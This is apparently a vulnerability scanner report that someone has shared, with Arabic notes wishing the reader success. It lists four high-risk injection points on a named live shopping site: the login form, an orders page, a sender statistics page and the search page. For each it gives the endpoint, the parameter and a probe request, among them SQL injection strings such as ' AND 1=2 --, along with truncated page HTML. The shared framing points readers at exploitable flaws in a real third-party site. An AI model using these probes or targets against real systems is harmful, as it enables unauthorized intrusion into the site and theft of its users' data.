فاااااااااااااااااااااك

1.  
2. At a glance
3. Classification Input Validation Error
4. Resource http://www.kardi.net/login.html
5. Parameter username
6. Method POST
7. Detection Type Blind Text Injection Differential
8. Risk High
9.  
10. Request
11. POST /login.html [username=' AND 1=2 -- password=vega ]
12. Resource Content
13. <!DOCTYPE html>
14. <html>
15. <head>
16. <meta charset="utf-8">
17. <meta http-equiv="X-UA-Compatible" content="IE=edge">
18. <meta name="viewport" content="width=device-width, initial-scale=1">
19. <title>بطاقتي .. نحو عالم أفضل للتسوق | تسجيل الدخول</title>
20. <meta name="description" content="نحو عالم أفضل للتسوق" />
21. <meta name="keywords" content="" />
22. <!-- Bootstrap CSS -->
23. <link href="...
24.  
25.  
26. ==================================================================================
27.  
28. At a glance
29. Classification Input Validation Error
30. Resource http://www.kardi.net/templates/design_en/cp/send_orders.html
31. Parameter order_tdate
32. Method POST
33. Detection Type Blind Arithmetic Evaluation Differential
34. Risk High
35.  
36. Request
37. POST /templates/design_en/cp/send_orders.html [order_name={$member_info.member_name} order_amount=100 order_foraccount={$banks.bank_name} order_tdate=1-0 ]
38. Resource Content
39. <!DOCTYPE html>
40. <html>
41. <head>
42. <meta charset="utf-8">
43. <meta http-equiv="X-UA-Compatible" content="IE=edge">
44. <meta name="viewport" content="width=device-width, initial-scale=1">
45. <title>بطاقتي .. نحو عالم أفضل للتسوق | </title>
46. <meta name="description" content="نحو عالم أفضل للتسوق" />
47. <meta name="keywords" content="" />
48. <!-- Bootstrap CSS -->
49. <link href="templates/des...
50.  
51.  
52. ========================================================================
53.  
54. Classification Input Validation Error
55. Resource http://www.kardi.net/templates/design_en/cp/sender_stat.html
56. Parameter sender_name
57. Method POST
58. Detection Type Blind Text Injection Differential
59. Risk High
60.  
61. Request
62. POST /templates/design_en/cp/sender_stat.html [sender_name=Joey'" ]
63. Resource Content
64. <!DOCTYPE html>
65. <html>
66. <head>
67. <meta charset="utf-8">
68. <meta http-equiv="X-UA-Compatible" content="IE=edge">
69. <meta name="viewport" content="width=device-width, initial-scale=1">
70. <title>بطاقتي .. نحو عالم أفضل للتسوق | </title>
71. <meta name="description" content="نحو عالم أفضل للتسوق" />
72. <meta name="keywords" content="" />
73. <!-- Bootstrap CSS -->
74. <link href="templates/des...
75.  
76. ==========================================================================
77.  
78.  
79. At a glance
80. Classification Input Validation Error
81. Resource http://www.kardi.net/templates/search.html
82. Parameter word
83. Method GET
84. Detection Type Blind Text Injection Differential
85. Risk High
86.  
87. Request
88. GET /templates/search.html?word='%20AND%201=2%20--%20
89. Resource Content
90. <!DOCTYPE html>
91. <html>
92. <head>
93. <meta charset="utf-8">
94. <meta http-equiv="X-UA-Compatible" content="IE=edge">
95. <meta name="viewport" content="width=device-width, initial-scale=1">
96. <title>بطاقتي .. نحو عالم أفضل للتسوق | </title>
97. <meta name="description" content="نحو عالم أفضل للتسوق" />
98. <meta name="keywords" content="" />
99. <!-- Bootstrap CSS -->
100. <link href="templates/des...
101.  
102.  
103. ====================================================================
104.  
105. في خط بين كل معلومات رابط و التاني
106. مع التمنيات بالتوفيق و النجاح :3